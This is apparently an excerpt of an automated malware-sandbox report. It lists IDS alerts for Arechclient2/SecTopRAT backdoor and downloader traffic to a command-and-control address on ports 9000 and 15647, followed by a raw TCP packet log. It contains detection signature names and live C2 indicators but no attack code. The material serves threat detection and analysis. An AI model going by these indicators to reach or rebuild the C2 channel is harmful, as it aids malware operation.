2024-12-17T08:10:56.978520+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.7	49843	185.147.124.236	9000	TCP
2024-12-17T08:10:58.417762+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49842	172.217.17.46	443	TCP
2024-12-17T08:10:58.525309+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49846	185.147.124.236	9000	TCP
2024-12-17T08:10:58.525309+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.7	49846	185.147.124.236	9000	TCP
2024-12-17T08:11:00.075555+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49852	185.147.124.236	9000	TCP
2024-12-17T08:11:00.075555+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.7	49852	185.147.124.236	9000	TCP
2024-12-17T08:11:01.271707+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49851	172.217.17.46	443	TCP
2024-12-17T08:11:01.610350+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.7	49857	185.147.124.236	9000	TCP
2024-12-17T08:11:03.148377+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49861	185.147.124.236	9000	TCP
2024-12-17T08:11:03.148377+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.7	49861	185.147.124.236	9000	TCP
2024-12-17T08:11:03.972658+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49859	142.250.181.100	443	TCP
2024-12-17T08:11:04.707352+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49867	185.147.124.236	9000	TCP
2024-12-17T08:11:04.707352+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.7	49867	185.147.124.236	9000	TCP
2024-12-17T08:11:06.252751+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.7	49873	185.147.124.236	9000	TCP
2024-12-17T08:11:06.694137+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49869	172.217.17.46	443	TCP
2024-12-17T08:11:07.797637+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49876	185.147.124.236	9000	TCP
2024-12-17T08:11:07.797637+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.7	49876	185.147.124.236	9000	TCP
2024-12-17T08:11:09.345741+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49882	185.147.124.236	9000	TCP
2024-12-17T08:11:09.345741+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.7	49882	185.147.124.236	9000	TCP
2024-12-17T08:11:09.602028+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49880	172.217.17.46	443	TCP
2024-12-17T08:11:10.892885+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49888	185.147.124.236	9000	TCP
2024-12-17T08:11:10.892885+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.7	49888	185.147.124.236	9000	TCP
2024-12-17T08:11:12.137208+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49889	142.250.181.100	443	TCP
2024-12-17T08:11:12.430923+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49891	185.147.124.236	9000	TCP
2024-12-17T08:11:12.430923+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.7	49891	185.147.124.236	9000	TCP
2024-12-17T08:11:14.232249+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.7	49898	185.147.124.236	9000	TCP
2024-12-17T08:11:14.889170+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49896	172.217.17.46	443	TCP
2024-12-17T08:11:15.777458+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49903	185.147.124.236	9000	TCP
2024-12-17T08:11:15.777458+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.7	49903	185.147.124.236	9000	TCP
2024-12-17T08:11:17.323931+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49908	185.147.124.236	9000	TCP
2024-12-17T08:11:17.323931+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.7	49908	185.147.124.236	9000	TCP
2024-12-17T08:11:17.795008+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49904	172.217.17.46	443	TCP
2024-12-17T08:11:19.011147+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49912	185.147.124.236	9000	TCP
2024-12-17T08:11:19.011147+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.7	49912	185.147.124.236	9000	TCP
2024-12-17T08:11:20.284309+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49913	142.250.181.100	443	TCP
2024-12-17T08:11:20.556013+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49918	185.147.124.236	9000	TCP
2024-12-17T08:11:20.556013+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.7	49918	185.147.124.236	9000	TCP
2024-12-17T08:11:22.102985+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49925	185.147.124.236	9000	TCP
2024-12-17T08:11:22.102985+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.7	49925	185.147.124.236	9000	TCP
2024-12-17T08:11:23.075863+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49922	172.217.17.46	443	TCP
2024-12-17T08:11:23.649156+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.7	49927	185.147.124.236	9000	TCP
2024-12-17T08:11:25.189370+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.7	49934	185.147.124.236	9000	TCP
2024-12-17T08:11:25.978115+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49932	172.217.17.46	443	TCP
2024-12-17T08:11:26.729269+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.7	49939	185.147.124.236	9000	TCP
2024-12-17T08:11:28.273021+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49945	185.147.124.236	9000	TCP
2024-12-17T08:11:28.273021+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.7	49945	185.147.124.236	9000	TCP
2024-12-17T08:11:28.607588+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49941	142.250.181.100	443	TCP
2024-12-17T08:11:29.911718+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49948	185.147.124.236	9000	TCP
2024-12-17T08:11:29.911718+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.7	49948	185.147.124.236	9000	TCP
2024-12-17T08:11:31.439666+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.7	49954	185.147.124.236	9000	TCP
2024-12-17T08:11:31.778870+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49949	172.217.17.46	443	TCP
2024-12-17T08:11:32.980422+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.7	49960	185.147.124.236	9000	TCP
2024-12-17T08:11:34.518294+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.7	49964	185.147.124.236	9000	TCP
2024-12-17T08:11:34.719815+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49961	172.217.17.46	443	TCP
2024-12-17T08:11:36.059783+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.7	49969	185.147.124.236	9000	TCP
2024-12-17T08:11:37.221887+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49970	142.250.181.100	443	TCP
2024-12-17T08:11:37.628765+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49975	185.147.124.236	9000	TCP
2024-12-17T08:11:37.628765+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.7	49975	185.147.124.236	9000	TCP
2024-12-17T08:11:39.163597+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49982	185.147.124.236	9000	TCP
2024-12-17T08:11:39.163597+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.7	49982	185.147.124.236	9000	TCP
2024-12-17T08:11:40.140824+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49977	172.217.17.46	443	TCP
2024-12-17T08:11:40.703138+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.7	49984	185.147.124.236	9000	TCP
2024-12-17T08:11:42.253405+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.7	49990	185.147.124.236	9000	TCP
2024-12-17T08:11:42.903142+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49989	172.217.17.46	443	TCP
2024-12-17T08:11:43.796182+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49996	185.147.124.236	9000	TCP
2024-12-17T08:11:43.796182+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.7	49996	185.147.124.236	9000	TCP
2024-12-17T08:11:45.336935+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.7	49999	185.147.124.236	9000	TCP
2024-12-17T08:11:45.404157+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49997	142.250.181.100	443	TCP
2024-12-17T08:11:46.875999+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.7	50005	185.147.124.236	9000	TCP
2024-12-17T08:11:48.389618+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	50004	172.217.17.46	443	TCP
2024-12-17T08:11:48.405536+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.7	50011	185.147.124.236	9000	TCP
2024-12-17T08:11:49.938950+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.7	50016	185.147.124.236	9000	TCP
2024-12-17T08:11:51.217521+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	50014	172.217.17.46	443	TCP
2024-12-17T08:11:51.476347+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.7	50020	185.147.124.236	9000	TCP
2024-12-17T08:11:53.008843+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	50025	185.147.124.236	9000	TCP
2024-12-17T08:11:53.008843+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.7	50025	185.147.124.236	9000	TCP
2024-12-17T08:11:53.708931+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	50024	142.250.181.100	443	TCP
2024-12-17T08:11:54.546737+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.7	50030	185.147.124.236	9000	TCP
2024-12-17T08:11:56.087410+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	50034	185.147.124.236	9000	TCP
2024-12-17T08:11:56.087410+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.7	50034	185.147.124.236	9000	TCP
2024-12-17T08:11:56.434833+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	50031	172.217.17.46	443	TCP
2024-12-17T08:11:57.627678+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	50039	185.147.124.236	9000	TCP
2024-12-17T08:11:57.627678+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.7	50039	185.147.124.236	9000	TCP
2024-12-17T08:11:59.165635+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.7	50045	185.147.124.236	9000	TCP
2024-12-17T08:11:59.275899+0100	2051910	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity	1	192.168.2.7	50048	185.147.124.236	15647	TCP
2024-12-17T08:11:59.339579+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	50041	172.217.17.46	443	TCP
2024-12-17T08:12:00.471695+0100	2029217	ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init	1	185.147.124.236	15647	192.168.2.7	50048	TCP
2024-12-17T08:12:00.712008+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.7	50049	185.147.124.236	9000	TCP
2024-12-17T08:12:01.069307+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	50050	142.250.181.100	443	TCP
2024-12-17T08:12:02.263672+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	50056	185.147.124.236	9000	TCP
2024-12-17T08:12:02.263672+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.7	50056	185.147.124.236	9000	TCP
2024-12-17T08:12:03.308965+0100	2051910	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity	1	192.168.2.7	50063	185.147.124.236	15647	TCP
2024-12-17T08:12:03.831888+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	50060	185.147.124.236	9000	TCP
2024-12-17T08:12:03.831888+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.7	50060	185.147.124.236	9000	TCP
2024-12-17T08:12:04.503623+0100	2029217	ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init	1	185.147.124.236	15647	192.168.2.7	50063	TCP
2024-12-17T08:12:05.359961+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.7	50067	185.147.124.236	9000	TCP
2024-12-17T08:12:06.915332+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	50069	185.147.124.236	9000	TCP
2024-12-17T08:12:06.915332+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.7	50069	185.147.124.236	9000	TCP
2024-12-17T08:12:08.454854+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	50074	185.147.124.236	9000	TCP
2024-12-17T08:12:08.454854+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.7	50074	185.147.124.236	9000	TCP
2024-12-17T08:12:09.995385+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.7	50080	185.147.124.236	9000	TCP
2024-12-17T08:12:17.310871+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.7	50083	185.147.124.236	9000	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 17, 2024 08:09:57.768682003 CET	49671	443	192.168.2.7	204.79.197.203
Dec 17, 2024 08:10:01.784775972 CET	49677	443	192.168.2.7	20.50.201.200
Dec 17, 2024 08:10:02.159363985 CET	49677	443	192.168.2.7	20.50.201.200
Dec 17, 2024 08:10:02.581080914 CET	49671	443	192.168.2.7	204.79.197.203
Dec 17, 2024 08:10:02.909082890 CET	49677	443	192.168.2.7	20.50.201.200
Dec 17, 2024 08:10:04.409152985 CET	49677	443	192.168.2.7	20.50.201.200
Dec 17, 2024 08:10:05.487229109 CET	49674	443	192.168.2.7	104.98.116.138
Dec 17, 2024 08:10:05.487257004 CET	49675	443	192.168.2.7	104.98.116.138
Dec 17, 2024 08:10:06.545818090 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:06.545846939 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:06.547156096 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:06.560128927 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:06.560146093 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:06.659452915 CET	49672	443	192.168.2.7	104.98.116.138
Dec 17, 2024 08:10:07.440362930 CET	49677	443	192.168.2.7	20.50.201.200
Dec 17, 2024 08:10:07.792191029 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:07.792323112 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:08.109699011 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:08.109733105 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:08.110181093 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:08.110258102 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:08.112607956 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:08.159332037 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:08.662000895 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:08.662056923 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:08.662067890 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:08.662086010 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:08.662098885 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:08.662123919 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:08.662139893 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:08.662143946 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:08.662173033 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:08.662184000 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:08.662199974 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:08.662204027 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:08.662224054 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:08.662250042 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:08.670154095 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:08.670196056 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:08.670211077 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:08.670248032 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:08.678539038 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:08.678587914 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:08.678596973 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:08.678611040 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:08.678632021 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:08.678663969 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:08.781661034 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:08.781718016 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:08.781739950 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:08.781779051 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:08.854290009 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:08.854361057 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:08.857932091 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:08.857985973 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:08.858052969 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:08.858094931 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:08.865921021 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:08.865971088 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:08.866048098 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:08.866089106 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:08.873986006 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:08.874038935 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:08.874043941 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:08.874083042 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:08.881943941 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:08.881993055 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:08.881997108 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:08.882035971 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:08.889908075 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:08.889959097 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:08.889964104 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:08.890001059 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:08.898050070 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:08.898113012 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:08.905915022 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:08.905980110 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:08.906038046 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:08.906083107 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:08.913866043 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:08.913942099 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:08.913947105 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:08.913990021 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:08.921847105 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:08.921905994 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:08.921910048 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:08.921950102 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:08.929491043 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:08.929537058 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:08.963699102 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:08.963825941 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:08.967333078 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:08.967396975 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:08.967431068 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:08.967472076 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:08.974900007 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:08.974989891 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.046000957 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.046066046 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.047341108 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.047390938 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.047400951 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.047445059 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.052134991 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.052201033 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.056649923 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.056727886 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.056732893 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.056770086 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.061721087 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.061804056 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.070764065 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.070878029 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.075532913 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.075638056 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.080383062 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.080460072 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.084902048 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.085002899 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.094137907 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.094249010 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.103539944 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.103612900 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.108453989 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.108520031 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.155838966 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.155932903 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.162647963 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.162728071 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.171963930 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.172049999 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.239779949 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.239865065 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.239897013 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.239948988 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.245311975 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.245378017 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.248068094 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.248130083 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.254060984 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.254127979 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.257195950 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.257268906 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.263156891 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.263246059 CET	49700	443	192.168.2.7	104.21.87.65
Dec 17, 2024 08:10:09.269172907 CET	443	49700	104.21.87.65	192.168.2.7
Dec 17, 2024 08:10:09.269236088 CET	49700	443	192.168.2.7	104.21.87.65
